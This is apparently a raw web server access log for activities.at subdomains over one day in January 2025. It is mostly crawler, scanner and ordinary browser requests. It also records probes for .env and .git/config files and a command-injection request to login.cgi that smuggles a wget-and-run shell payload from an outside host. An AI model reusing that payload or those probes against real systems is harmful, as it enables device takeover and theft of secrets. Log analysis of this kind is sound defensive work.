156.59.198.136 - - [29/Jan/2025:01:03:31 +0100] "GET /renault.activities.at/htdocs/dompdf-master/www/test/images/png/rgb16_t_bk.png HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
165.154.138.165 - - [29/Jan/2025:01:04:05 +0100] "\x16\x03\x01\x01\x17\x01" 400 383 "-" "-"
165.154.138.165 - - [29/Jan/2025:01:04:16 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"
165.154.138.165 - - [29/Jan/2025:01:04:16 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
165.154.138.165 - - [29/Jan/2025:01:04:16 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
165.154.138.165 - - [29/Jan/2025:01:04:16 +0100] "GET /sitemap.xml HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
165.154.138.165 - - [29/Jan/2025:01:04:16 +0100] "GET /config.json HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
156.59.198.135 - - [29/Jan/2025:01:16:13 +0100] "GET /ed.activities.at/stats/lang/awstats-et.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
87.120.115.34 - - [29/Jan/2025:01:17:54 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
156.59.198.135 - - [29/Jan/2025:01:20:13 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201911260903_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jan/2025:01:24:13 +0100] "GET /ed.activities.at/stats/lang/awstats-se.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jan/2025:01:28:13 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202109071503_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.247.137.14 - - [29/Jan/2025:01:40:31 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
185.247.137.98 - - [29/Jan/2025:01:40:33 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
156.59.198.135 - - [29/Jan/2025:01:41:31 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202102171503_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
172.206.142.34 - - [29/Jan/2025:01:48:23 +0100] "GET /manager/html HTTP/1.1" 404 283 "-" "Mozilla/5.0 zgrab/0.x"
172.206.148.71 - - [29/Jan/2025:01:49:57 +0100] "MGLNDD_212.69.160.11_80" 400 383 "-" "-"
156.59.198.135 - - [29/Jan/2025:01:54:45 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image101.jpg HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jan/2025:01:58:46 +0100] "GET /renault.activities.at/htdocs/binaries/10223416.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
80.82.77.202 - - [29/Jan/2025:02:10:46 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (X11; CentOS; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0"
146.19.24.168 - - [29/Jan/2025:02:14:04 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
80.82.77.202 - - [29/Jan/2025:02:21:19 +0100] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
156.59.198.136 - - [29/Jan/2025:02:22:48 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201912021103_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Jan/2025:02:51:21 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202111091503_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Jan/2025:02:55:22 +0100] "GET /renault.activities.at/htdocs/binaries/10279221.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.55.132 - - [29/Jan/2025:02:56:47 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [29/Jan/2025:03:00:44 +0100] "GET /renault.activities.at/htdocs/binaries/10623060.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
93.46.120.42 - - [29/Jan/2025:03:00:50 +0100] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
95.214.55.43 - - [29/Jan/2025:03:04:51 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [29/Jan/2025:03:20:47 +0100] "GET /ed.activities.at/stats/lang/awstats-de.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
146.19.24.168 - - [29/Jan/2025:03:23:46 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
185.196.220.253 - - [29/Jan/2025:03:24:46 +0100] "GET / HTTP/1.1" 200 423 "-" "Hello World"
66.240.223.202 - - [29/Jan/2025:03:39:53 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
156.59.198.136 - - [29/Jan/2025:04:06:58 +0100] "GET /renault.activities.at/htdocs/binaries/10331571.pdf HTTP/1.0" 404 312 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jan/2025:04:10:57 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/config/toolbar%20quick%20mode.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jan/2025:04:14:58 +0100] "GET /ed.activities.at/stats/lang/awstats-cz.txt HTTP/1.0" 404 305 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Jan/2025:04:18:58 +0100] "GET /ed.activities.at/stats/lang/awstats-jp.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jan/2025:04:44:08 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202012071103_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
139.162.71.210 - - [29/Jan/2025:04:44:35 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
156.59.198.136 - - [29/Jan/2025:04:48:08 +0100] "GET /renault.activities.at/htdocs/binaries/10462869.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jan/2025:04:52:08 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202110150903_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
49.235.74.13 - - [29/Jan/2025:04:57:42 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.248.224.147/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0"
156.59.198.135 - - [29/Jan/2025:05:01:08 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201909041303_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
195.3.223.55 - - [29/Jan/2025:05:02:52 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
141.255.166.90 - - [29/Jan/2025:05:02:54 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [29/Jan/2025:05:05:08 +0100] "GET /renault.activities.at/htdocs/binaries/10004943.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
179.43.191.146 - - [29/Jan/2025:05:14:04 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [29/Jan/2025:05:15:39 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202103100903_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
45.156.128.43 - - [29/Jan/2025:05:27:55 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
156.59.198.136 - - [29/Jan/2025:05:37:38 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image065.jpg HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
167.94.146.61 - - [29/Jan/2025:05:45:19 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
167.94.146.61 - - [29/Jan/2025:05:45:24 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.61 - - [29/Jan/2025:05:45:24 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.61 - - [29/Jan/2025:05:45:24 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.61 - - [29/Jan/2025:05:45:24 +0100] "PRI * HTTP/2.0" 400 383 "-" "-"
45.148.10.242 - - [29/Jan/2025:05:46:59 +0100] "GET / HTTP/1.1" 200 423 "-" "Hello World/1.0"
193.23.3.37 - - [29/Jan/2025:05:51:01 +0100] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
87.120.115.119 - - [29/Jan/2025:05:58:47 +0100] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Linux; Android 5.1.1; A37f) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
156.59.198.135 - - [29/Jan/2025:06:04:46 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202010200903_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
45.148.10.242 - - [29/Jan/2025:06:06:57 +0100] "GET / HTTP/1.1" 200 423 "-" "Hello World/1.0"
156.59.198.135 - - [29/Jan/2025:06:09:00 +0100] "GET /ed.activities.at/stats/lang/awstats-pt.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
195.3.223.55 - - [29/Jan/2025:06:12:10 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
146.19.24.168 - - [29/Jan/2025:06:28:28 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
141.255.166.90 - - [29/Jan/2025:06:46:05 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
5.181.190.248 - - [29/Jan/2025:06:47:58 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [29/Jan/2025:06:49:57 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202004081003_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.196.220.253 - - [29/Jan/2025:06:54:11 +0100] "GET / HTTP/1.1" 200 423 "-" "Hello World"
205.185.127.18 - - [29/Jan/2025:06:57:58 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 OPR/78.0.4093.112"
219.121.69.165 - - [29/Jan/2025:07:03:33 +0100] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
156.59.198.136 - - [29/Jan/2025:07:20:47 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202107141503_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Jan/2025:07:52:56 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image119.jpg HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Jan/2025:08:01:34 +0100] "GET /docs/ecommlogistics/belege/STORNORE17-00010.PDF HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
195.3.223.55 - - [29/Jan/2025:08:07:51 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [29/Jan/2025:08:08:31 +0100] "GET /ed.activities.at/stats/lang/awstats-pl.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
45.148.10.242 - - [29/Jan/2025:08:10:28 +0100] "GET / HTTP/1.1" 200 423 "-" "Hello World/1.0"
141.255.166.90 - - [29/Jan/2025:08:13:03 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
64.62.197.183 - - [29/Jan/2025:08:19:38 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:62.0) Gecko/20100101 Firefox/62.0"
146.19.24.168 - - [29/Jan/2025:08:21:00 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
130.211.96.179 - - [29/Jan/2025:08:21:04 +0100] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.32.3"
156.59.198.135 - - [29/Jan/2025:08:22:40 +0100] "GET /renault.activities.at/htdocs/binaries/10231944.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
64.62.197.182 - - [29/Jan/2025:08:23:49 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15"
64.62.197.195 - - [29/Jan/2025:08:24:55 +0100] "GET /geoserver/web/ HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:62.0) Gecko/20100101 Firefox/62.0"
64.62.197.189 - - [29/Jan/2025:08:25:46 +0100] "GET /info.php HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:62.0) Gecko/20100101 Firefox/62.0"
64.62.197.182 - - [29/Jan/2025:08:25:56 +0100] "GET /phpinfo.php HTTP/1.1" 200 10252 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Iron Safari/537.36"
64.62.197.188 - - [29/Jan/2025:08:26:07 +0100] "GET /dashboard/phpinfo.php HTTP/1.1" 404 290 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36"
156.59.198.135 - - [29/Jan/2025:08:26:41 +0100] "GET /ed.activities.at/stats/lang/awstats-ua.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.19.116 - - [29/Jan/2025:08:30:42 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.55.43 - - [29/Jan/2025:08:36:12 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
47.128.117.175 - - [29/Jan/2025:08:42:42 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
176.123.9.59 - - [29/Jan/2025:08:57:23 +0100] "GET /.git/config HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Linux; Android 9; MI 9) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
176.123.9.59 - - [29/Jan/2025:08:57:25 +0100] "GET /.git/config HTTP/1.1" 404 296 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4"
156.59.198.136 - - [29/Jan/2025:08:58:48 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202108171103_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.189.182.234 - - [29/Jan/2025:09:02:08 +0100] "GET / HTTP/1.1" 400 383 "-" "-"
156.59.198.135 - - [29/Jan/2025:09:02:49 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202111051003_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
57.128.220.248 - - [29/Jan/2025:09:05:04 +0100] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.32.3"
57.128.220.248 - - [29/Jan/2025:09:05:04 +0100] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.32.3"
156.59.198.135 - - [29/Jan/2025:09:06:48 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202010071203_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
45.148.10.242 - - [29/Jan/2025:09:07:58 +0100] "GET / HTTP/1.1" 200 423 "-" "Hello World/1.0"
45.144.212.139 - - [29/Jan/2025:09:10:26 +0100] "GET /.git/HEAD HTTP/1.1" 404 284 "-" "Web Downloader/6.9"
156.59.198.136 - - [29/Jan/2025:09:10:49 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image152.gif HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
87.5.108.195 - - [29/Jan/2025:09:21:23 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
156.59.198.136 - - [29/Jan/2025:09:22:04 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202108171203_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Jan/2025:09:26:04 +0100] "GET /ed.activities.at/stats/lang/awstats-mk.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
5.181.190.248 - - [29/Jan/2025:09:27:13 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
178.165.186.69 - - [29/Jan/2025:09:33:09 +0100] "GET /layout.php HTTP/1.1" 200 815 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [29/Jan/2025:09:33:10 +0100] "GET /entry.php?id=10273 HTTP/1.1" 200 1903 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [29/Jan/2025:09:33:10 +0100] "GET /entry.php?id=11412 HTTP/1.1" 200 1759 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [29/Jan/2025:09:33:10 +0100] "GET /entry.php?id=10270 HTTP/1.1" 200 908 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [29/Jan/2025:09:33:10 +0100] "GET /entry.php?id=10272 HTTP/1.1" 200 1159 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [29/Jan/2025:09:33:10 +0100] "GET /gui/javascript/form_form.js?1738139590 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [29/Jan/2025:09:33:10 +0100] "GET /gui/styles/tmplDefault.css HTTP/1.1" 200 2135 "http://hausegger.activities.at/entry.php?id=11412" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [29/Jan/2025:09:33:10 +0100] "GET /gui/javascript/form_form.js?1738139590 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=11412" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [29/Jan/2025:09:33:10 +0100] "GET /entry.php?id=10287 HTTP/1.1" 200 2419 "http://hausegger.activities.at/entry.php?id=11412" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [29/Jan/2025:09:33:10 +0100] "GET /entry.php?id=10271& HTTP/1.1" 200 935 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [29/Jan/2025:09:33:11 +0100] "GET /entry.php?id=10273& HTTP/1.1" 200 1902 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [29/Jan/2025:09:33:11 +0100] "GET /entry.php?id=10270& HTTP/1.1" 200 909 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [29/Jan/2025:09:33:11 +0100] "GET /gui/javascript/form_form.js?1738139591 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10273&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [29/Jan/2025:09:33:11 +0100] "GET /gui/javascript/form_form.js?1738139591 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10270&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
156.59.198.135 - - [29/Jan/2025:09:34:05 +0100] "GET /docs/contadino/2015/AG15-00017.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.186.69 - - [29/Jan/2025:09:33:12 +0100] "POST /entry.php?id=10287& HTTP/1.1" 200 1968 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [29/Jan/2025:09:34:16 +0100] "GET /gui/javascript/form_form.js?1738139656 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
